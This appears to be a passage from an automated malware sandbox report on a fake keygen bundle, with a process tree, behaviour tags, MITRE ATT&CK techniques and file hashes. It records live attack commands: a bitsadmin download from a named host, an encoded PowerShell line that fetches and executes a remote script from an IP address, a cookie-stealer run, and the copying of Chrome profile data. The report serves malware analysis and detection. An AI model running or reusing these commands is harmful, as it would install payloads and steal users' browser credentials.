C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pvnX6Az3B09XYRiZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2zJ3SuXA9t5eWq2 -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PQUvOF\PQUvOF.dll" PQUvOF10⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PQUvOF\PQUvOF.dll" PQUvOF11⤵
- Loads dropped DLL
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszD9E3.tmp\tempfile.ps1"10⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lz3iayfj.or0\app.exe /8-2222 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\lz3iayfj.or0\app.exeC:\Users\Admin\AppData\Local\Temp\lz3iayfj.or0\app.exe /8-22229⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\lz3iayfj.or0\app.exe"C:\Users\Admin\AppData\Local\Temp\lz3iayfj.or0\app.exe" /8-222210⤵
- Modifies data under HKEY_USERS
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\28FB.exeC:\Users\Admin\AppData\Local\Temp\28FB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\32A1.exeC:\Users\Admin\AppData\Local\Temp\32A1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\48BA.exeC:\Users\Admin\AppData\Local\Temp\48BA.exe1⤵
-
C:\Users\Admin\AppData\Local\Tempwllpap.exe"C:\Users\Admin\AppData\Local\Tempwllpap.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\DBA5.exeC:\Users\Admin\AppData\Local\Temp\DBA5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E421.exeC:\Users\Admin\AppData\Local\Temp\E421.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\EF3E.exeC:\Users\Admin\AppData\Local\Temp\EF3E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\F1C0.exeC:\Users\Admin\AppData\Local\Temp\F1C0.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F490.exeC:\Users\Admin\AppData\Local\Temp\F490.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C powershell -ep bypass -enc JAB0AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABNAHMAeABtAGwAMgAuAFgATQBMAEgAVABUAFAAOwAkAHQALgBvAHAAZQBuACgAJwBHAEUAVAAnACwAJwBoAHQAdABwADoALwAvADQANQAuADYAMQAuADEAMwA2AC4AMQA5ADgALwBzAHUAawBhAC4AcABzADEAJwAsACQAZgBhAGwAcwBlACkAOwAkAHQALgBzAGUAbgBkACgAKQA7AGkAZQB4ACAAJAB0AC4AcgBlAHMAcABvAG4AcwBlAFQAZQB4AHQA2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -enc JAB0AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABNAHMAeABtAGwAMgAuAFgATQBMAEgAVABUAFAAOwAkAHQALgBvAHAAZQBuACgAJwBHAEUAVAAnACwAJwBoAHQAdABwADoALwAvADQANQAuADYAMQAuADEAMwA2AC4AMQA5ADgALwBzAHUAawBhAC4AcABzADEAJwAsACQAZgBhAGwAcwBlACkAOwAkAHQALgBzAGUAbgBkACgAKQA7AGkAZQB4ACAAJAB0AC4AcgBlAHMAcABvAG4AcwBlAFQAZQB4AHQA3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs4⤵
-
C:\Users\Admin\AppData\Local\Temp\FCFD.exeC:\Users\Admin\AppData\Local\Temp\FCFD.exe1⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\432.exeC:\Users\Admin\AppData\Local\Temp\432.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\BA5.exeC:\Users\Admin\AppData\Local\Temp\BA5.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BA5.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1AC9.exeC:\Users\Admin\AppData\Local\Temp\1AC9.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\21DE.exeC:\Users\Admin\AppData\Local\Temp\21DE.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\2990.exeC:\Users\Admin\AppData\Local\Temp\2990.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\2DE6.exeC:\Users\Admin\AppData\Local\Temp\2DE6.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\3318.exeC:\Users\Admin\AppData\Local\Temp\3318.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\3318.exe"C:\Users\Admin\AppData\Local\Temp\3318.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\3318.exe"C:\Users\Admin\AppData\Local\Temp\3318.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\3318.exe"C:\Users\Admin\AppData\Local\Temp\3318.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\496F.exeC:\Users\Admin\AppData\Local\Temp\496F.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\a952c924ff7d4690830bc045c90a3d54 /t 3032 /p 30921⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\5tvl3dqb.5ha\KiffApp2.exe"C:\Users\Admin\AppData\Local\Temp\5tvl3dqb.5ha\KiffApp2.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\11-ef066-6c3-d8ca3-8f324a64d499e\SHaewushotezhi.exe"C:\Users\Admin\AppData\Local\Temp\11-ef066-6c3-d8ca3-8f324a64d499e\SHaewushotezhi.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5k1in5hm.hji\gaoou.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\5k1in5hm.hji\gaoou.exeC:\Users\Admin\AppData\Local\Temp\5k1in5hm.hji\gaoou.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgxhvvdl.mgz\google-game.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\jgxhvvdl.mgz\google-game.exeC:\Users\Admin\AppData\Local\Temp\jgxhvvdl.mgz\google-game.exe3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vdie52jq.wnz\md1_1eaf.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\vdie52jq.wnz\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\vdie52jq.wnz\md1_1eaf.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\katertje.j2k\build.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\katertje.j2k\build.exeC:\Users\Admin\AppData\Local\Temp\katertje.j2k\build.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\katertje.j2k\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak0gb1zs.v0c\askinstall36.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\ak0gb1zs.v0c\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\ak0gb1zs.v0c\askinstall36.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hazb4vkz.hpd\KiffApp2.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\hazb4vkz.hpd\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\hazb4vkz.hpd\KiffApp2.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4551rxpf.ewm\y1.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\4551rxpf.ewm\y1.exeC:\Users\Admin\AppData\Local\Temp\4551rxpf.ewm\y1.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xc5awxjm.vvy\JIGATYRLOT.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\xc5awxjm.vvy\JIGATYRLOT.exeC:\Users\Admin\AppData\Local\Temp\xc5awxjm.vvy\JIGATYRLOT.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4yrhu1wd.ud1\ABCbrowser.exe /VERYSILENT & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\4yrhu1wd.ud1\ABCbrowser.exeC:\Users\Admin\AppData\Local\Temp\4yrhu1wd.ud1\ABCbrowser.exe /VERYSILENT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4r5h5t4.rcr\toolspab1.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\d4r5h5t4.rcr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\d4r5h5t4.rcr\toolspab1.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\d4r5h5t4.rcr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\d4r5h5t4.rcr\toolspab1.exe4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czbsz0ys.gwe\inst.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\czbsz0ys.gwe\inst.exeC:\Users\Admin\AppData\Local\Temp\czbsz0ys.gwe\inst.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\cxKSXoGmZJFTEoJoGA\odGLszC:\Users\Admin\AppData\Local\Temp\cxKSXoGmZJFTEoJoGA\odGLsz4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h15tqlal.32s\GcleanerWW.exe /mixone & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\30dw5enr.hlv\google-game.exe"C:\Users\Admin\AppData\Local\Temp\30dw5enr.hlv\google-game.exe"1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install2⤵
-
C:\Users\Admin\AppData\Local\Temp\59-9e386-e2e-33f96-bf3fb44c916d3\Dugaeshurihu.exe"C:\Users\Admin\AppData\Local\Temp\59-9e386-e2e-33f96-bf3fb44c916d3\Dugaeshurihu.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rgdfunpl.5pk\gaoou.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\rgdfunpl.5pk\gaoou.exeC:\Users\Admin\AppData\Local\Temp\rgdfunpl.5pk\gaoou.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxx3jrbt.fbl\google-game.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\lxx3jrbt.fbl\google-game.exeC:\Users\Admin\AppData\Local\Temp\lxx3jrbt.fbl\google-game.exe3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\koluqmzr.en2\md1_1eaf.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\koluqmzr.en2\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\koluqmzr.en2\md1_1eaf.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ddjratak.3je\build.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\ddjratak.3je\build.exeC:\Users\Admin\AppData\Local\Temp\ddjratak.3je\build.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qaegxvbv.hxd\askinstall36.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\qaegxvbv.hxd\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\qaegxvbv.hxd\askinstall36.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zjtwvosn.0fq\KiffApp2.exe & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\zjtwvosn.0fq\KiffApp2.exeC:\Users\Admin\AppData\Local\Temp\zjtwvosn.0fq\KiffApp2.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbraroek.2km\y1.exe & exit2⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a9d055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Disabling Security Tools
2Modify Registry
6Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
99f759b1359f668460997440d90c2fe7
SHA1f8939891a2cf988303c037f1f87a5f91b4c0ed09
SHA25645429de54937289346cbdadb00a1fcaae003b436ebdb6fbdf0c0dea37b15bb76
SHA512c0e4a8db5eb112385066165bc4287654e854c3cdf7f6b3c35725a66f34d4fa113b161001ed96093a371053f832b3797478b0999985087181fa32699d2cc40c4f
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exeMD5
65b49b106ec0f6cf61e7dc04c0a7eb74
SHA1a1f4784377c53151167965e0ff225f5085ebd43b
SHA256862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd
SHA512e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exeMD5
65b49b106ec0f6cf61e7dc04c0a7eb74
SHA1a1f4784377c53151167965e0ff225f5085ebd43b
SHA256862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd
SHA512e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exeMD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
SHA512d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exeMD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
SHA512d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exeMD5
2b8fd490536f06e384cdafcf209d69fc
SHA1805ce755ad7d4568d6aa6595a8839e19a9a03236
SHA2562b9f5c927c6a2e81349de5ea6506934e7f2322931f1affe730198fab943c23b9
SHA512ee91fab4c7df432fca06886254bfbc83dc970892907ca09b7570dd72f307375cbc96f84c70ad41d592f95f2cf79e0c3b22e2202824ca302d30bce219b3d5a33d
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exeMD5
2b8fd490536f06e384cdafcf209d69fc
SHA1805ce755ad7d4568d6aa6595a8839e19a9a03236
SHA2562b9f5c927c6a2e81349de5ea6506934e7f2322931f1affe730198fab943c23b9
SHA512ee91fab4c7df432fca06886254bfbc83dc970892907ca09b7570dd72f307375cbc96f84c70ad41d592f95f2cf79e0c3b22e2202824ca302d30bce219b3d5a33d
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.batMD5
